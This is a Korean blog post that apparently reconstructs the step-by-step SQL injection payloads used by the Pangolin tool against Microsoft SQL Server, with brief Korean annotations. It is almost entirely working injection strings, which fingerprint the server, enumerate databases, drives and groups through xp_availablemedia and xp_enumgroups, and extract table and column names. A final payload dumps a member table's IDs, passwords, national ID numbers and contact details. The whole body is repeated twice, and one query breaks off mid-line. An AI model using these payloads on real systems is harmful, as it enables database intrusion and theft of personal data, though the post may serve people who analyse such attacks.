Pangolin(MSSQL)
webhxxx/weblog 2009. 12. 18. 17:22 |-Information
--Version : ' and @@version=1--
--Db Name : ' and db_name()=0--
--Server Name : ' and @@servername=0--
--Host Name : ' and host_name()=0--
--System User : ' and system_user=0--
--Current User : ' and user=0--
--Privilege : ' and cast(is_srvrolemember(0x730079007300610064006d0069006e00) as nvarchar(1))+char(124)=1--
--Databases :
' and 0=(select top 1 cast([name] as nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top 1 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)--
' and 0=(select top 1 cast([name] as nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top 2 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)--
.
.
.
동일한 응답이 나오면 중단
--Drivers :
'%20;drop%20table%20pangolin_test_table;--
'%20;create%20table%20pangolin_test_table(name%20nvarchar(255),low%20nvarchar(255),high%20nvarchar(255),type%20nvarchar(255));--
'%20;insert%20pangolin_test_table%20exec%20master.dbo.xp_availablemedia;--
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([type]%20as%20nvarchar(4000))%20from(select%20top%20%201%20[name],[low],[high],[type]%20from%20pangolin_test_table%20group%20by%20[name],[low],[high],[type]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([type]%20as%20nvarchar(4000))%20from(select%20top%20%202%20[name],[low],[high],[type]%20from%20pangolin_test_table%20group%20by%20[name],[low],[high],[type]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([type]%20as%20nvarchar(4000))%20from(select%20top%20%203%20[name],[low],[high],[type]%20from%20pangolin_test_table%20group%20by%20[name],[low],[high],[type]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20;drop%20table%20pangolin_test_table;--
--LocalGropus :
'%20;drop%20table%20pangolin_test_table;--
'%20;create%20table%20pangolin_test_table(name%20nvarchar(255),description%20nvarchar(4000));--
'%20;insert%20pangolin_test_table%20exec%20master.dbo.xp_enumgroups;--
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([description]%20as%20nvarchar(4000))%20from(select%20top%20%201%20[name],[description]%20from%20pangolin_test_table%20group%20by%20[name],[description]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([description]%20as%20nvarchar(4000))%20from(select%20top%20%202%20[name],[description]%20from%20pangolin_test_table%20group%20by%20[name],[description]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([description]%20as%20nvarchar(4000))%20from(select%20top%20%203%20[name],[description]%20from%20pangolin_test_table%20group%20by%20[name],[description]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
>
' ;drop table pangolin_test_table;--
' ;create table pangolin_test_table(name nvarchar(255),description nvarchar(4000));--
' ;insert pangolin_test_table exec master.dbo.xp_enumgroups;--
' and 0=(select top 1 cast([name] as nvarchar(4000))+char(94)+cast([description] as nvarchar(4000)) from(select top 1 [name],[description] from pangolin_test_table group by [name],[description] order by [name]) t order by [name] desc)----
' and 0=(select top 1 cast([name] as nvarchar(4000))+char(94)+cast([description] as nvarchar(4000)) from(select top 2 [name],[description] from pangolin_test_table group by [name],[description] order by [name]) t order by [name] desc)----
' and 0=(select top 1 cast([name] as nvarchar(4000))+char(94)+cast([description] as nvarchar(4000)) from(select top 3 [name],[description] from pangolin_test_table group by
-Data
--Tables(조회)
' and (select cast(count(1) as varchar(10))+char(94) from [sysobjects] where xtype=char(85) and status!=0)=0--
sysobjects의 레코드중 xtype이 u인 갯수 (사용자테이블 갯수)
' and (select top 1 cast(name as varchar(256)) from(select top 1 id,name from [sysobjects] where xtype=char(85) and status!=0 order by id) t order by id desc)=0--
' and (select top 1 cast(name as varchar(256)) from(select top 2 id,name from [sysobjects] where xtype=char(85) and status!=0 order by id) t order by id desc)=0--
' and (select top 1 cast(name as varchar(256)) from(select top 3 id,name from [sysobjects] where xtype=char(85) and status!=0 order by id) t order by id desc)=0--
테이블명 추출
--Columns
' and (select top 1 cast(id as nvarchar(20))+char(124) from [sysobjects] where name=0x6d0065006d00620065007200)=0--
테이블명을 헥사로 변경(우회)하여 id값을 추출 (from sysobjects)
' and (select cast(count(1) as varchar(10))+char(94) from [syscolumns] where id=549576996)=0--
id값을 가진 모든 column갯수 추출 (from syscolumns)
' and (select top 1 cast(name as varchar(8000)) from (select top 1 colid,name from [syscolumns] where id=549576996 order by colid) t order by colid desc)=0--
각 column의 이름 추출 (from syscolumns)
.
.
.
' and (select top 1 cast(name as varchar(8000)) from (select top 2 colid,name from [syscolumns] where id=549576996 order by colid) t order by colid desc)=0--
계속 추출
--Datas
' and (select cast(count(1) as varchar(8000))+char(94) from [member] where 1=1)=0--
해당 테이블(member)의 레코드 수 추출
' and (select top 1
isnull(cast([mem_id] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_pwd] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_name] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_jumin] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_zip] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_addr1] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_addr2] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_tel] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_hp] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_email] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_wtday] as nvarchar(4000)),char(32))
from [member] where 1=1 order by [mem_id])=0--
각 레코드의 필드값 알아내기
이어서..
--Version : ' and @@version=1--
--Db Name : ' and db_name()=0--
--Server Name : ' and @@servername=0--
--Host Name : ' and host_name()=0--
--System User : ' and system_user=0--
--Current User : ' and user=0--
--Privilege : ' and cast(is_srvrolemember(0x730079007300610064006d0069006e00) as nvarchar(1))+char(124)=1--
--Databases :
' and 0=(select top 1 cast([name] as nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top 1 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)--
' and 0=(select top 1 cast([name] as nvarchar(256))+char(94)+cast([filename] as nvarchar(256)) from(select top 2 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)--
.
.
.
동일한 응답이 나오면 중단
--Drivers :
'%20;drop%20table%20pangolin_test_table;--
'%20;create%20table%20pangolin_test_table(name%20nvarchar(255),low%20nvarchar(255),high%20nvarchar(255),type%20nvarchar(255));--
'%20;insert%20pangolin_test_table%20exec%20master.dbo.xp_availablemedia;--
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([type]%20as%20nvarchar(4000))%20from(select%20top%20%201%20[name],[low],[high],[type]%20from%20pangolin_test_table%20group%20by%20[name],[low],[high],[type]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([type]%20as%20nvarchar(4000))%20from(select%20top%20%202%20[name],[low],[high],[type]%20from%20pangolin_test_table%20group%20by%20[name],[low],[high],[type]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([type]%20as%20nvarchar(4000))%20from(select%20top%20%203%20[name],[low],[high],[type]%20from%20pangolin_test_table%20group%20by%20[name],[low],[high],[type]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20;drop%20table%20pangolin_test_table;--
--LocalGropus :
'%20;drop%20table%20pangolin_test_table;--
'%20;create%20table%20pangolin_test_table(name%20nvarchar(255),description%20nvarchar(4000));--
'%20;insert%20pangolin_test_table%20exec%20master.dbo.xp_enumgroups;--
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([description]%20as%20nvarchar(4000))%20from(select%20top%20%201%20[name],[description]%20from%20pangolin_test_table%20group%20by%20[name],[description]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([description]%20as%20nvarchar(4000))%20from(select%20top%20%202%20[name],[description]%20from%20pangolin_test_table%20group%20by%20[name],[description]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
'%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([description]%20as%20nvarchar(4000))%20from(select%20top%20%203%20[name],[description]%20from%20pangolin_test_table%20group%20by%20[name],[description]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)----
>
' ;drop table pangolin_test_table;--
' ;create table pangolin_test_table(name nvarchar(255),description nvarchar(4000));--
' ;insert pangolin_test_table exec master.dbo.xp_enumgroups;--
' and 0=(select top 1 cast([name] as nvarchar(4000))+char(94)+cast([description] as nvarchar(4000)) from(select top 1 [name],[description] from pangolin_test_table group by [name],[description] order by [name]) t order by [name] desc)----
' and 0=(select top 1 cast([name] as nvarchar(4000))+char(94)+cast([description] as nvarchar(4000)) from(select top 2 [name],[description] from pangolin_test_table group by [name],[description] order by [name]) t order by [name] desc)----
' and 0=(select top 1 cast([name] as nvarchar(4000))+char(94)+cast([description] as nvarchar(4000)) from(select top 3 [name],[description] from pangolin_test_table group by
-Data
--Tables(조회)
' and (select cast(count(1) as varchar(10))+char(94) from [sysobjects] where xtype=char(85) and status!=0)=0--
sysobjects의 레코드중 xtype이 u인 갯수 (사용자테이블 갯수)
' and (select top 1 cast(name as varchar(256)) from(select top 1 id,name from [sysobjects] where xtype=char(85) and status!=0 order by id) t order by id desc)=0--
' and (select top 1 cast(name as varchar(256)) from(select top 2 id,name from [sysobjects] where xtype=char(85) and status!=0 order by id) t order by id desc)=0--
' and (select top 1 cast(name as varchar(256)) from(select top 3 id,name from [sysobjects] where xtype=char(85) and status!=0 order by id) t order by id desc)=0--
테이블명 추출
--Columns
' and (select top 1 cast(id as nvarchar(20))+char(124) from [sysobjects] where name=0x6d0065006d00620065007200)=0--
테이블명을 헥사로 변경(우회)하여 id값을 추출 (from sysobjects)
' and (select cast(count(1) as varchar(10))+char(94) from [syscolumns] where id=549576996)=0--
id값을 가진 모든 column갯수 추출 (from syscolumns)
' and (select top 1 cast(name as varchar(8000)) from (select top 1 colid,name from [syscolumns] where id=549576996 order by colid) t order by colid desc)=0--
각 column의 이름 추출 (from syscolumns)
.
.
.
' and (select top 1 cast(name as varchar(8000)) from (select top 2 colid,name from [syscolumns] where id=549576996 order by colid) t order by colid desc)=0--
계속 추출
--Datas
' and (select cast(count(1) as varchar(8000))+char(94) from [member] where 1=1)=0--
해당 테이블(member)의 레코드 수 추출
' and (select top 1
isnull(cast([mem_id] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_pwd] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_name] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_jumin] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_zip] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_addr1] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_addr2] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_tel] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_hp] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_email] as nvarchar(4000)),char(32))
+char(94)+
isnull(cast([mem_wtday] as nvarchar(4000)),char(32))
from [member] where 1=1 order by [mem_id])=0--
각 레코드의 필드값 알아내기
이어서..
'webhxxx > weblog' 카테고리의 다른 글
| 안드로이드 user-agent (0) | 2010.05.11 |
|---|---|
| 허니팟 (0) | 2010.03.14 |
| Zeroboard4 코드실행 취약점을 이용한 웹쉘공격 (0) | 2010.03.09 |
| User-Agent: Mediapartners-Google (0) | 2009.10.01 |
| [webdav]웹 폴더서비스 이용시 발생하는 트래픽 (0) | 2009.09.30 |